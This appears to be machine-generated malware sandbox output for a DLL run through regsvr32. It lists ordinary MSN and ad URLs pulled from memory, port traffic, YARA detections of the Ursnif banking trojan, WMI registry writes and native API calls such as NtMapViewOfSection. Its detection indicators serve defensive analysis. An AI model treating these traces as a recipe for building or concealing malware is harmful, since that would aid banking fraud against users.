Source: iab2Data[1].json.5.dr	String found in binary or memory: https://www.gadsme.com/privacy-policy/
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/
Source: {4D2E24F5-2A8A-11EB-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/finanzen/top-stories/zahlen-sie-kontaktlos-der-aufruf-befeuert-das-bancoma
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/homepage/api/modules/fetch"
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata"
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/schweiz/krawallanten-halunke-so-giftig-wird-um-die-konzerninit
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/das-l%c3%a4nderspiel-schweiz-ukraine-findet-weder-heute-noch-mo
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/einweg-masken-heissen-nicht-so-weil-man-sie-auf-den-weg-schmeis
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/gstaad-springt-f%c3%bcr-moudon-als-etappenort-ein/ar-BB1b9zw4?o
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/ich-habe-immer-gemeint-dass-wir-%c3%a4lteren-den-jungen-egal-si
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/pl%c3%b6tzlich-steht-da-roger-federer-und-fragt-nach-marroni/ar
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/rechtsextreme-trainieren-und-posieren-vermummt-in-luzern/ar-BB1
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/news/other/wohl-kein-nati-spiel-am-dienstag-in-luzern/ar-BB1b5oQw?ocid=hpl
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com/de-ch/sport/fussball/alle-ukrainer-in-quarant%c3%a4ne-nati-spiel-von-heute-ist-a
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.office.com/?omkt=de-ch%26WT.mc_id=MSN_site
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn
Source: auction[1].htm.5.dr	String found in binary or memory: https://www.outbrain.com/legal/privacy/de
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://www.remixd.com/privacy_policy.html
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_shop_de&utm
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.skype.com/
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://www.skype.com/de
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://www.skype.com/de/download-skype
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&vertical=custom&pageType=
Source: de-ch[1].htm.5.dr	String found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl
Source: 85-0f8009-68ddb2ab[1].js.5.dr	String found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin
Source: iab2Data[1].json.5.dr	String found in binary or memory: https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdf
Source: auction[1].htm.5.dr	String found in binary or memory: https://zem.outbrainimg.com/p/srv/sha/bd/60/86/2bac2dfa2c6662619bff6d55b47d20ea92.jpg?w=311&h=33
Source: auction[1].htm.5.dr	String found in binary or memory: https://zem.outbrainimg.com/p/srv/sha/cd/43/89/7c899940bc66fc80bffd6e3c5d7ea952cc.jpg?w=311&h=33

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000003.289458489.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289762811.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.505056221.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289651842.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289685101.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289724522.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289496678.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289545009.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289584112.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6644, type: MEMORY

Source: loaddll32.exe, 00000001.00000002.504001338.0000000000A4B000.00000004.00000020.sdmp	Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: loaddll32.exe, 00000001.00000002.504001338.0000000000A4B000.00000004.00000020.sdmp	Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000003.289458489.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289762811.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.505056221.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289651842.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289685101.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289724522.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289496678.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289545009.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.289584112.0000000004D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6644, type: MEMORY

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00401E57 GetProcAddress,NtCreateSection,memset,	2_2_00401E57
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_004011EA NtMapViewOfSection,	2_2_004011EA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_004023F5 NtQueryVirtualMemory,	2_2_004023F5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_044B6066 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	2_2_044B6066
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_044BB10D NtQueryVirtualMemory,	2_2_044BB10D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00401E57 GetProcAddress,NtCreateSection,memset,	2_2_00401E57
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_004011EA NtMapViewOfSection,	2_2_004011EA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_004023F5 NtQueryVirtualMemory,	2_2_004023F5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_044B6066 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	2_2_044B6066
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_044BB10D NtQueryVirtualMemory,	2_2_044BB10D

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_004021D4	2_2_004021D4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_044BAEEC	2_2_044BAEEC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_044B15CD	2_2_044B15CD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_004021D4	2_2_004021D4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_044BAEEC	2_2_044BAEEC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_044B15CD	2_2_044B15CD

Source: 0pz1on1.dll	Static PE information: invalid certificate
Source: 0pz1on1.dll	Static PE information: invalid certificate

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: @ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ? .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: > .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: = .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: < .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ; .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: : .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 9 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 8 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 7 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 6 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 5 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 4 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 3 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 2 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 1 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 0 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: - .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: , .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: + .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: * .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ) .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ( .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ' .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: & .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: % .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: $ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: # .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ' .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ! .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
